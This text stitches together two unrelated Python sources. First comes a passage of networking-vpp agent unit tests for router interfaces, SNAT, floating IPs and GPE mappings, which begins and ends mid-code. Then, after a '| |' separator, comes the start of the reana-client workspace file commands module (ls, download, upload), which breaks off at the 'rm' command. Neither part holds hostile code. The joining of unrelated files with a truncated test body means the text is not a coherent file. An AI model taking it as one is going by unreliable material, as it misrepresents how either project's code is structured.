'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def _test_create_router_interface_with_existing_bvi_different_ip(
self, m_network_on_host, port, router, other_router):
# Test adding a different router interface.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses', return_value=[]):
with mock.patch.object(self.vpp.vpp, 'get_interface_vrf',
return_value=5):
self.vpp.ensure_router_interface_on_host(port, router)
self.vpp.vpp.create_loopback.assert_not_called()
self.vpp.vpp.set_loopback_bridge_bvi.assert_not_called()
self.vpp.vpp.set_interface_vrf.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5,
iface(router['gateway_ip'], router['prefixlen']))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
@mock.patch(
'networking_vpp.agent.server.VPPForwarder.' +
'export_routes_from_tenant_vrfs')
def _test_delete_router_interface_on_host(self, m_export_routes,
m_network_on_host, port,
is_ipv6):
# Test deleting a router interface to delete the router in VPP.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
if not is_ipv6:
router_port = self._get_mock_router_interface()
else:
router_port = self._get_mock_v6_router_interface()
self.vpp.router_interfaces[port] = router_port
gateway_ip = router_port['gateway_ip']
prefixlen = router_port['prefixlen']
self.vpp.vpp.get_snat_interfaces.return_value = [5]
self.vpp.vpp.get_bridge_bvi.return_value = 5
self.vpp.vpp.get_interface_ip_addresses.return_value = [
iface(gateway_ip, prefixlen)
]
self.vpp.delete_router_interface_on_host(port)
self.vpp.vpp.set_snat_on_interface.assert_called_once_with(
5, is_add=False, is_inside=True)
m_export_routes.assert_called_once_with(source_vrf=5, is_add=False)
self.vpp.vpp.get_bridge_bvi.assert_called_once_with(5)
self.vpp.vpp.delete_loopback.assert_called_once_with(5)
self.assertIsNone(self.vpp.router_interfaces.get(port))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def _test_delete_router_interface_with_multiple_interfaces(
self, m_network_on_host, port, is_ipv6):
# Test deleting a router interface with interfaces from other subnets
# also present on the router.
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
if not is_ipv6:
router_port = self._get_mock_router_interface()
else:
router_port = self._get_mock_v6_router_interface()
self.vpp.router_interfaces[port] = router_port
gateway_ip = router_port['gateway_ip']
prefixlen = router_port['prefixlen']
second_gateway_ip = '172.16.58.3' if not is_ipv6 else 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'
second_gateway_prefixlen = 24
self.vpp.vpp.get_snat_interfaces.return_value = [5]
self.vpp.vpp.get_bridge_bvi.return_value = 5
self.vpp.vpp.get_interface_ip_addresses.return_value = [
iface(gateway_ip, prefixlen),
iface(second_gateway_ip, second_gateway_prefixlen)]
self.vpp.delete_router_interface_on_host(port)
self.vpp.vpp.delete_loopback.assert_not_called()
self.vpp.vpp.del_interface_ip.assert_called_once_with(
5, iface(gateway_ip, prefixlen))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_on_host(self, m_network_on_host):
router = self._get_mock_external_router()
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.snat_overload_on_interface_address.\
assert_called_once_with(5)
self.vpp.vpp.set_snat_on_interface.assert_called_once_with(
5, 0)
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5,
iface(router['gateways'][0][0], router['gateways'][0][1]))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_with_snat_interface_set(
self, m_network_on_host):
router = self._get_mock_external_router()
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[5]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.set_snat_on_interface.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5,
iface(router['gateways'][0][0], router['gateways'][0][1]))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_with_snat_int_and_ip_set(
self, m_network_on_host):
router = self._get_mock_external_router()
interface_ip = router['gateways'][0][0]
prefixlen = router['gateways'][0][1]
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[5]):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.set_snat_on_interface.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_called_once_with(
5, iface(interface_ip, prefixlen))
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager.' +
'ensure_network')
def test_create_router_external_gateway_snat_int_ip_and_ext_gw_set(
self, m_network_on_host):
router = self._get_mock_external_router()
interface_ip = router['gateways'][0][0]
prefixlen = router['gateways'][0][1]
m_network_on_host.return_value = {'bridge_domain_id': 'fake_dom_id'}
with mock.patch.object(self.vpp.vpp, 'get_bridge_bvi',
return_value=5):
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[5]):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[
iface(ip_address(interface_ip), prefixlen)]):
self.vpp.ensure_router_interface_on_host(
uuidgen.uuid1(), router)
self.vpp.vpp.set_snat_on_interface.assert_not_called()
self.vpp.vpp.set_interface_ip.assert_not_called()
def test_delete_router_external_gateway_on_host(self):
router_port = self._get_mock_router_external_interface()
port_id = uuidgen.uuid1()
self.vpp.router_external_interfaces[port_id] = router_port
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[router_port['bvi_if_idx']]):
with mock.patch.object(self.vpp.vpp,
'get_outside_snat_interface_indices',
return_value=[router_port['bvi_if_idx']]):
with mock.patch.object(
self.vpp.vpp,
'get_interface_ip_addresses',
return_value=[
iface(ip_address(router_port['gateway_ip']),
router_port['prefixlen'])]):
with mock.patch.object(self.vpp.vpp,
'get_bridge_bvi',
return_value=router_port[
'bvi_if_idx']):
self.vpp.delete_router_interface_on_host(port_id)
self.vpp.vpp.set_snat_on_interface.\
assert_called_once_with(router_port['bvi_if_idx'],
is_inside=False,
is_add=False)
self.vpp.vpp.snat_overload_on_interface_address.\
assert_called_once_with(router_port['bvi_if_idx'],
is_add=False)
self.vpp.vpp.delete_loopback.assert_called_once_with(
router_port['bvi_if_idx'])
def test_delete_router_external_gateway_no_snat_addr(self):
router_port = self._get_mock_router_external_interface()
port_id = uuidgen.uuid1()
self.vpp.router_external_interfaces[port_id] = router_port
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[]):
with mock.patch.object(self.vpp.vpp,
'get_outside_snat_interface_indices',
return_value=[]):
with mock.patch.object(
self.vpp.vpp, 'get_bridge_bvi',
return_value=router_port['bvi_if_idx']):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[
iface(router_port['gateway_ip'],
router_port['prefixlen'])]):
self.vpp.delete_router_interface_on_host(port_id)
self.vpp.vpp.set_snat_on_interface.\
assert_not_called()
self.vpp.vpp.snat_overload_on_interface_address.\
assert_not_called()
self.vpp.vpp.delete_loopback.assert_called_once_with(
router_port['bvi_if_idx'])
def test_delete_router_external_gateway_no_snat_addr_and_no_ext_gw(self):
router_port = self._get_mock_router_external_interface()
port_id = uuidgen.uuid1()
self.vpp.router_external_interfaces[port_id] = router_port
with mock.patch.object(self.vpp.vpp, 'get_snat_interfaces',
return_value=[]):
with mock.patch.object(self.vpp.vpp,
'get_outside_snat_interface_indices',
return_value=[]):
with mock.patch.object(self.vpp.vpp,
'get_bridge_bvi', return_value=None):
with mock.patch.object(
self.vpp.vpp, 'get_interface_ip_addresses',
return_value=[]):
self.vpp.delete_router_interface_on_host(port_id)
self.vpp.vpp.set_snat_on_interface.\
assert_not_called()
self.vpp.vpp.snat_overload_on_interface_address.\
assert_not_called()
self.vpp.vpp.delete_loopback.assert_not_called()
def test_v4_router_interface_create_on_host(self):
self._test_create_router_interface_on_host(
port=uuidgen.uuid1(),
router=self._get_mock_router_interface())
def test_v6_router_interface_create_on_host(self):
self._test_create_router_interface_on_host(
port=uuidgen.uuid1(),
router=self._get_mock_v6_router_interface())
def test_v4_router_interface_create_with_existing_bvi_and_ip(self):
self._test_create_router_interface_with_existing_bvi_and_ip(
port=uuidgen.uuid1(),
router=self._get_mock_router_interface())
def test_v6_router_interface_create_with_existing_bvi_and_ip(self):
self._test_create_router_interface_with_existing_bvi_and_ip(
port=uuidgen.uuid1(),
router=self._get_mock_v6_router_interface())
def test_v4_router_interface_create_with_existing_bvi_different_ip(self):
self._test_create_router_interface_with_existing_bvi_different_ip(
port=uuidgen.uuid1(),
router=self._get_mock_router_interface(),
other_router=self._get_mock_v6_router_interface())
def test_v6_router_interface_create_with_existing_bvi_different_ip(self):
self._test_create_router_interface_with_existing_bvi_different_ip(
port=uuidgen.uuid1(),
router=self._get_mock_v6_router_interface(),
other_router=self._get_mock_router_interface())
def test_v4_router_interface_delete(self):
self._test_delete_router_interface_on_host(
port=uuidgen.uuid1(), is_ipv6=False)
def test_v6_router_interface_delete(self):
self._test_delete_router_interface_on_host(
port=uuidgen.uuid1(), is_ipv6=True)
def test_v4_router_interface_delete_with_multiple_interfaces(self):
self._test_delete_router_interface_with_multiple_interfaces(
port=uuidgen.uuid1(), is_ipv6=False)
def test_v6_router_interface_delete_with_multiple_interfaces(self):
self._test_delete_router_interface_with_multiple_interfaces(
port=uuidgen.uuid1(), is_ipv6=True)
def test_create_floatingip_on_vpp(self):
"""Test create floatingip processing.
Verify that the SNAT create APIs are called.
"""
floatingip_dict = self._get_mock_floatingip()
self.vpp.vpp.get_interface_vrf.return_value = floatingip_dict[
'tenant_vrf']
floatingip_uuid = floatingip_dict['UUID']
mock.patch.object(self.vpp, '_get_snat_indexes',
return_value=(
floatingip_dict['loopback_idx'],
floatingip_dict['external_idx'])).start()
self.vpp.associate_floatingip(floatingip_uuid, floatingip_dict)
self.vpp.vpp.get_snat_interfaces.return_value = []
self.vpp.vpp.set_snat_on_interface.assert_any_call(
floatingip_dict['loopback_idx'])
self.vpp.vpp.set_snat_on_interface.assert_any_call(
floatingip_dict['external_idx'], is_inside=0)
self.vpp.vpp.get_interface_vrf.assert_called_with(1)
self.assertEqual(self.vpp.vpp.set_snat_static_mapping.call_count, 1)
self.vpp.vpp.set_snat_static_mapping.assert_called_once_with(
ip_address(floatingip_dict['fixed_ip_address']),
ip_address(floatingip_dict['floating_ip_address']),
floatingip_dict['tenant_vrf'])
self.vpp.vpp.clear_snat_sessions.assert_called_once_with(
ip_address(floatingip_dict['fixed_ip_address']))
def test_create_floatingip_on_vpp_existing_entry(self):
"""Test create floatingip processing with existing indexes.
Verify that the SNAT interfaces are not created if they already
exist on the VPP.
"""
floatingip_dict = self._get_mock_floatingip()
self.vpp.vpp.get_snat_interfaces.return_value = [4, 5]
self.vpp.vpp.get_interface_vrf.return_value = 1
mock.patch.object(self.vpp, '_get_snat_indexes',
return_value=(4, 5)).start()
value = mock.MagicMock()
value.local_ip_address = ip_address(
floatingip_dict['fixed_ip_address'])
value.external_ip_address = ip_address(
floatingip_dict['floating_ip_address'])
value.vrf_id = 1
self.vpp.vpp.get_snat_static_mappings.return_value = [value]
self.vpp.associate_floatingip(floatingip_dict['floating_ip_address'],
floatingip_dict)
self.assertFalse(self.vpp.vpp.set_snat_on_interface.call_count)
self.assertFalse(self.vpp.vpp.set_snat_static_mapping.call_count)
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager')
def test_create_floatingip_on_vpp_no_internal_network(self,
mock_net_driver):
"""Test create floatingip processing without an internal network.
Verify that the SNAT interfaces are not created when the
internal network (router interface) hasn't been created.
"""
floatingip_dict = self._get_mock_floatingip()
self.vpp.net_driver = mock_net_driver
mock_net_driver.ensure_network.return_value = None
self.vpp.associate_floatingip(floatingip_dict['floating_ip_address'],
floatingip_dict)
self.assertFalse(self.vpp.vpp.set_snat_on_interface.call_count)
def test_delete_floatingip_on_vpp(self):
"""Test delete floatingip processing.
Verify that the SNAT delete APIs are called.
"""
floatingip_dict = self._get_mock_floatingip()
floating_ip = floatingip_dict['floating_ip_address']
self.vpp.floating_ips[floating_ip] = floatingip_dict
self.vpp.vpp.get_snat_local_ipaddresses.return_value = [
floatingip_dict['fixed_ip_address']]
self.vpp.disassociate_floatingip(floating_ip)
self.vpp.vpp.set_snat_static_mapping.assert_called_once_with(
ip_address(floatingip_dict['fixed_ip_address']),
ip_address(floatingip_dict['floating_ip_address']),
floatingip_dict['tenant_vrf'],
is_add=0)
self.assertIsNone(self.vpp.floating_ips.get(floating_ip))
def test_delete_floatingip_on_vpp_non_existing(self):
"""Test delete a non-exisiting floatingip within VPP.
Verify that a SNAT delete operation is not performed.
"""
floatingip_dict = self._get_mock_floatingip()
floating_ip = floatingip_dict['floating_ip_address']
self.vpp.floating_ips[floating_ip] = floatingip_dict
self.vpp.vpp.get_snat_local_ipaddresses.return_value = []
self.vpp.disassociate_floatingip(floating_ip)
self.vpp.vpp.set_snat_static_mapping.assert_not_called()
self.assertIsNone(self.vpp.floating_ips.get(floating_ip))
def test_ensure_gpe_network_on_host(self):
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.mac_age = 300
self.vpp.gpe.gpe_locators = "test_net"
physnet, net_type, seg_id = 'test_net', 'gpe', 5000
self.vpp.gpe.gpe_src_cidr = "10.1.1.1/24"
self.vpp.vpp.get_bridge_domains.return_value = []
self.vpp.vpp.get_lisp_vni_to_bd_mappings.return_value = []
ret_val = self.net_driver.ensure_network(physnet, net_type, seg_id)
self.vpp.vpp.create_bridge_domain.assert_called_once_with(
70000, 300)
self.vpp.vpp.add_lisp_vni_to_bd_mapping.assert_called_once_with(
vni=5000, bridge_domain=70000)
self.vpp.vpp.set_interface_ip.assert_called_once_with(
720,
ip_interface("10.1.1.1/24"))
self.vpp.vpp.set_interface_tag.assert_called_with(
720, 'net-vpp.physnet:test_net')
network_data = self.net_driver.get_network('test_net', 'gpe', 5000)
expected_val = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_uplink_idx': None,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': 'test_net'}
self.assertEqual(network_data, expected_val)
self.assertEqual(ret_val, expected_val)
def test_delete_gpe_network_on_host(self):
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.net_driver.networks = {}
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.physnets = {"test_net": "test_iface"}
physnet, net_type, seg_id = 'test_net', 'gpe', 5000
mock_data = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_uplink_idx': 720,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': "test_net"}
mock_gpe_local_map_data = {'vnis': set([5000])}
mock_gpe_remote_map_data = {('1:1:1:1:1:1', 5000): '1.1.1.1',
('2:2:2:2:2:2', 5000): '2.2.2.2',
('3:3:3:3:3:3', 5001): '3.3.3.3'
}
self.vpp.vpp.get_lisp_vni_to_bd_mappings.return_value = [(5000,
70000)]
self.vpp.gpe.gpe_map[gpe_lset_name] = mock_gpe_local_map_data
self.vpp.gpe.gpe_map['remote_map'] = mock_gpe_remote_map_data
self.net_driver.networks[(physnet, net_type, seg_id)] = mock_data
self.net_driver.delete_network(physnet, net_type, seg_id)
self.vpp.vpp.del_lisp_vni_to_bd_mapping.assert_called_once_with(
vni=5000, bridge_domain=70000)
self.assertEqual(self.vpp.gpe.gpe_map[gpe_lset_name]['vnis'], set([]))
self.vpp.vpp.del_lisp_remote_mac.assert_any_call(
'1:1:1:1:1:1', 5000)
self.vpp.vpp.del_lisp_remote_mac.assert_any_call(
'2:2:2:2:2:2', 5000)
self.assertEqual(self.vpp.gpe.gpe_map['remote_map'], {
('3:3:3:3:3:3', 5001): '3.3.3.3'})
self.assertEqual(self.net_driver.networks, {})
@mock.patch(
'networking_vpp.agent.server.VPPForwarder.' +
'ensure_interface_in_vpp_bridge')
@mock.patch(
'networking_vpp.agent.server.VPPForwarder.ensure_interface_on_host')
@mock.patch(
'networking_vpp.agent.network_interface.NetworkDriverManager')
def test_bind_gpe_interface_on_host(self,
mock_net_driver,
mock_ensure_int_on_host,
mock_ensure_int_in_bridge):
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.physnets = {"test_net": "test_iface"}
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.gpe.gpe_locators = "test_net"
self.vpp.gpe.gpe_src_cidr = "10.1.1.1/24"
self.net_driver = mock_net_driver
mock_net_data = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_uplink_idx': 720,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': 'test_net'}
mock_props = {'iface_idx': 10,
'bind_type': 'vhostuser',
'mac': '11:11:11:11:11:11',
'path': '/tmp/fake-path'}
mock_gpe_map = {'vnis': set([]),
'sw_if_idxs': set([]),
'local_map': {}}
self.vpp.gpe.gpe_map[gpe_lset_name] = mock_gpe_map
mock_net_driver.ensure_network.return_value = mock_net_data
mock_ensure_int_on_host.return_value = mock_props
self.vpp.bind_interface_on_host('vhostuser', 'fake-uuid',
mock_props['mac'], 'test_net', 'gpe',
5000)
mock_ensure_int_in_bridge.assert_called_once_with(70000, 10)
self.assertEqual(
self.vpp.gpe.gpe_map[gpe_lset_name]['vnis'],
set([5000]))
self.vpp.vpp.add_lisp_local_mac.assert_called_once_with(
mock_props['mac'], 5000, gpe_lset_name)
self.assertEqual(
self.vpp.gpe.gpe_map[gpe_lset_name]['local_map'][mock_props[
'mac']], 5000)
def test_unbind_gpe_interface_on_host(self):
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.physnets = {"test_net": "test_iface"}
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.gpe.gpe_locators = "test_net"
port_uuid = 'fake-port-uuid'
mock_net_data = {'bridge_domain_id': 70000,
'if_physnet': "test_iface",
'if_test_net_idx': 720,
'network_type': 'gpe',
'segmentation_id': 5000,
'physnet': 'test_net'}
mock_props = {'iface_idx': 10,
'bind_type': 'vhostuser',
'mac': '11:11:11:11:11:11',
'path': '/tmp/fake-path',
'net_data': mock_net_data}
mock_gpe_map = {'vnis': set([5000]),
'sw_if_indxs': set([720]),
'local_map': {'11:11:11:11:11:11': 5000}
}
self.vpp.vpp.get_lisp_vni_to_bd_mappings.return_value = [(5000,
70000)]
self.vpp.interfaces[port_uuid] = mock_props
self.net_driver.networks[('test_net', 'gpe', 5000)] = mock_net_data
self.vpp.gpe.gpe_map[gpe_lset_name] = mock_gpe_map
self.vpp.gpe.gpe_map['remote_map'] = {}
self.vpp.port_ips[port_uuid] = '1.1.1.1'
# Nominates an empty bridge that must be deleted
# We no longer delete bridges that don't exist
self.vpp.vpp.get_bridge_domains.return_value = {70000: []}
self.vpp.unbind_interface_on_host(port_uuid)
self.vpp.vpp.del_lisp_local_mac.assert_called_once_with(
mock_props['mac'],
mock_net_data['segmentation_id'],
gpe_lset_name)
self.assertEqual(self.vpp.gpe.gpe_map[gpe_lset_name]['local_map'], {})
self.assertEqual(self.vpp.interfaces, {})
self.vpp.vpp.delete_bridge_domain.assert_called_once_with(
mock_net_data['bridge_domain_id'])
self.vpp.vpp.del_lisp_vni_to_bd_mapping.assert_called_once_with(
vni=mock_net_data['segmentation_id'],
bridge_domain=mock_net_data['bridge_domain_id'])
self.assertEqual(self.vpp.gpe.gpe_map[gpe_lset_name]['vnis'], set([]))
self.assertEqual(self.net_driver.networks, {})
@mock.patch('networking_vpp.agent.gpe.GpeListener')
@mock.patch('networking_vpp.agent.server.EtcdListener')
def test_ensure_remote_gpe_mapping(self, mock_etcd_listener,
mock_gpe_listener):
"""Test Adding remote GPE mappings.
Patch the EtcdListener object in and create a mock GpeWatcher.
Then simulate an mock_gpe_key add.
Test the remote mapping and ARP entry modules
"""
mock_gpe_key = "/networking-vpp/global/networks/gpe" + \
"/1077/ml-ucs-02/fa:16:3e:47:2e:3c/10.1.1.2"
mock_remote_ip = "1.1.1.1"
mock_bridge_domain = 66077
with patch.object(gpe.GpeWatcher, 'added',
autospec=True) as mock_add_key:
mock_etcd_client = mock.MagicMock()
mock_etcd_listener.gpe_listener = mock_gpe_listener
mock_etcd_listener.gpe_listener.\
is_valid_remote_map.return_value = True
self.vpp.physnets = {"test_net": "test_iface"}
self.vpp.gpe = gpe.GPEForwarder(self.vpp)
self.vpp.gpe.gpe_locators = "test_net"
mock_etcd_listener.vppf = self.vpp
gpe_lset_name = constants.GPE_LSET_NAME
self.vpp.gpe.gpe_map = {gpe_lset_name: {
'local_map': {},
'vnis': set(),
'sw_if_idxs': set()},
'remote_map': {}}
self.vpp.vpp.exists_lisp_arp_entry.return_value = False
underlay_ip_str = '1.1.1.1'
underlay_ip = ip_address(underlay_ip_str)
gpe.GpeWatcher(mock_etcd_client,
'gpe_watcher',
mock_gpe_key,
mock_etcd_listener).added(mock_gpe_key,
mock_remote_ip)
mock_add_key.assert_called_once_with(mock.ANY,
mock_gpe_key,
mock_remote_ip)
self.vpp.gpe.ensure_remote_gpe_mapping(1077, 'fa:16:3e:47:2e:3c',
'10.1.1.2', underlay_ip_str)
| |
<reponame>matthewfeickert/reana-client
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2018, 2019, 2020, 2021, 2022 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client output related commands."""
import json
import logging
import os
import sys
import traceback
import click
from reana_commons.utils import click_table_printer
from reana_client.printer import display_message
from reana_client.api.utils import get_path_from_operation_id
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
human_readable_or_raw_option,
parse_filter_parameters,
parse_format_parameters,
)
from reana_client.config import JSON, URL
from reana_client.errors import FileDeletionError, FileUploadError
FILES_BLACKLIST = (".git/", "/.git/")
@click.group(help="Workspace file management commands")
@click.pass_context
def files_group(ctx):
"""Top level wrapper for files related interactions."""
logging.debug(ctx.info_name)
@files_group.command("ls")
@add_workflow_option
@check_connection
@click.option(
"--format",
"_format",
multiple=True,
help="Format output according to column titles or column values. "
"Use `<column_name>=<column_value>` format. For "
"E.g. display FILES named data.txt "
"`--format name=data.txt`.",
)
@click.option(
"--json",
"output_format",
flag_value="json",
default=None,
help="Get output in JSON format.",
)
@click.option(
"--url",
"output_format",
flag_value="url",
default=None,
help="Get URLs of output files.",
)
@click.option(
"--filter",
"filters",
multiple=True,
help="Filter results to show only files that match certain filtering "
"criteria such as file name, size or modification date."
"Use `--filter <columm_name>=<column_value>` pairs. "
"Available filters are ``name``, ``size`` and ``last-modified``.",
)
@click.argument("filename", metavar="SOURCE", nargs=1, required=False)
@human_readable_or_raw_option
@add_access_token_options
@add_pagination_options
@click.pass_context
def get_files(
ctx,
workflow,
_format,
filters,
output_format,
filename,
access_token,
page,
size,
human_readable_or_raw,
): # noqa: D301
"""List workspace files.
The ``ls`` command lists workspace files of a workflow specified by the
environment variable REANA_WORKON or provided as a command-line flag
``--workflow`` or ``-w``. The SOURCE argument is optional and specifies a
pattern matching files and directories.
Examples: \n
\t $ reana-client ls --workflow myanalysis.42 \n
\t $ reana-client ls --workflow myanalysis.42 --human-readable \n
\t $ reana-client ls --workflow myanalysis.42 'data/*root*' \n
\t $ reana-client ls --workflow myanalysis.42 --filter name=hello
""" # noqa: W605
import tablib
from reana_client.api.client import current_rs_api_client, list_files
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
search_filter = None
headers = ["name", "size", "last-modified"]
if filters:
_, search_filter = parse_filter_parameters(filters, headers)
if _format:
parsed_format_filters = parse_format_parameters(_format)
if workflow:
logging.info('Workflow "{}" selected'.format(workflow))
try:
response = list_files(
workflow, access_token, filename, page, size, search_filter
)
data = []
file_path = get_path_from_operation_id(
current_rs_api_client.swagger_spec.spec_dict["paths"], "download_file"
)
urls = []
for file_ in response:
if not file_["name"].startswith(FILES_BLACKLIST):
data.append(
list(
map(
str,
[
file_["name"],
file_["size"][human_readable_or_raw],
file_["last-modified"],
],
)
)
)
urls.append(
ctx.obj.reana_server_url
+ file_path.format(
workflow_id_or_name=workflow, file_name=file_["name"]
)
)
tablib_data = tablib.Dataset()
tablib_data.headers = headers
for row in data:
tablib_data.append(row)
if output_format == URL:
display_message("\n".join(urls))
elif _format:
tablib_data, filtered_headers = format_data(
parsed_format_filters, headers, tablib_data
)
if output_format == JSON:
display_message(json.dumps(tablib_data))
else:
tablib_data = [list(item.values()) for item in tablib_data]
click_table_printer(filtered_headers, filtered_headers, tablib_data)
else:
if output_format == JSON:
display_message(tablib_data.export(output_format))
else:
click_table_printer(headers, _format, data)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while retrieving file list"
" for workflow {0}:\n{1}".format(workflow, str(e)),
msg_type="error",
)
@files_group.command("download")
@click.argument("filenames", metavar="FILES", nargs=-1)
@add_workflow_option
@check_connection
@click.option(
"-o",
"--output-directory",
default=os.getcwd(),
help="Path to the directory where files will be downloaded.",
)
@add_access_token_options
@click.pass_context
def download_files(
ctx, workflow, filenames, output_directory, access_token
): # noqa: D301
"""Download workspace files.
The ``download`` command allows to download workspace files and directories.
By default, the files specified in the workflow specification as outputs
are downloaded. You can also specify the individual files you would like
to download, see examples below.
Examples: \n
\t $ reana-client download # download all output files \n
\t $ reana-client download mydata.tmp outputs/myplot.png
"""
from reana_client.api.client import download_file, get_workflow_specification
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if not filenames:
reana_spec = get_workflow_specification(workflow, access_token)["specification"]
if "outputs" in reana_spec:
filenames = []
filenames += reana_spec["outputs"].get("files", [])
filenames += reana_spec["outputs"].get("directories", [])
if workflow:
for file_name in filenames:
try:
binary_file, file_name = download_file(
workflow, file_name, access_token
)
logging.info(
"{0} binary file downloaded ... writing to {1}".format(
file_name, output_directory
)
)
outputs_file_path = os.path.join(output_directory, file_name)
if not os.path.exists(os.path.dirname(outputs_file_path)):
os.makedirs(os.path.dirname(outputs_file_path))
with open(outputs_file_path, "wb") as f:
f.write(binary_file)
display_message(
"File {0} downloaded to {1}.".format(file_name, output_directory),
msg_type="success",
)
except OSError as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"File {0} could not be written.".format(file_name),
msg_type="error",
)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"File {0} could not be downloaded: {1}".format(file_name, e),
msg_type="error",
)
@files_group.command("upload")
@click.argument(
"filenames",
metavar="SOURCES",
type=click.Path(exists=True, resolve_path=True),
nargs=-1,
)
@add_workflow_option
@check_connection
@add_access_token_options
@click.pass_context
def upload_files(ctx, workflow, filenames, access_token): # noqa: D301
"""Upload files and directories to workspace.
The ``upload`` command allows to upload workflow input files and
directories. The SOURCES argument can be repeated and specifies which files
and directories are to be uploaded, see examples below. The default
behaviour is to upload all input files and directories specified in the
reana.yaml file.
Examples: \n
\t $ reana-client upload -w myanalysis.42 \n
\t $ reana-client upload -w myanalysis.42 code/mycode.py
"""
from reana_client.api.client import get_workflow_specification, upload_to_server
logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
for p in ctx.params:
logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
if not filenames:
reana_spec = get_workflow_specification(workflow, access_token)["specification"]
if "inputs" in reana_spec:
filenames = []
filenames += [
os.path.join(os.getcwd(), f)
for f in reana_spec["inputs"].get("files") or []
]
filenames += [
os.path.join(os.getcwd(), d)
for d in reana_spec["inputs"].get("directories") or []
]
if workflow:
if filenames:
for filename in filenames:
try:
response = upload_to_server(workflow, filename, access_token)
for file_ in response:
if file_.startswith("symlink:"):
display_message(
"Symlink resolved to {}. "
"Uploaded hard copy.".format(file_[len("symlink:") :]),
msg_type="success",
)
else:
display_message(
"File {} was successfully uploaded.".format(file_),
msg_type="success",
)
except FileNotFoundError as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"File {0} could not be uploaded: "
"{0} does not exist.".format(filename),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
except FileUploadError as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while uploading {0}.\n"
"{1}".format(filename, str(e)),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
display_message(
"Something went wrong while uploading {}: \n"
"{}".format(filename, str(e)),
msg_type="error",
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@files_group.command("rm")
@click.argument("filenames", metavar="SOURCES", nargs=-1)
@add_workflow_option
@check_connection
@add_access_token_options
@click.pass_context
def delete_files(ctx, workflow, filenames, access_token): # noqa: D301
"""Delete files from workspace.
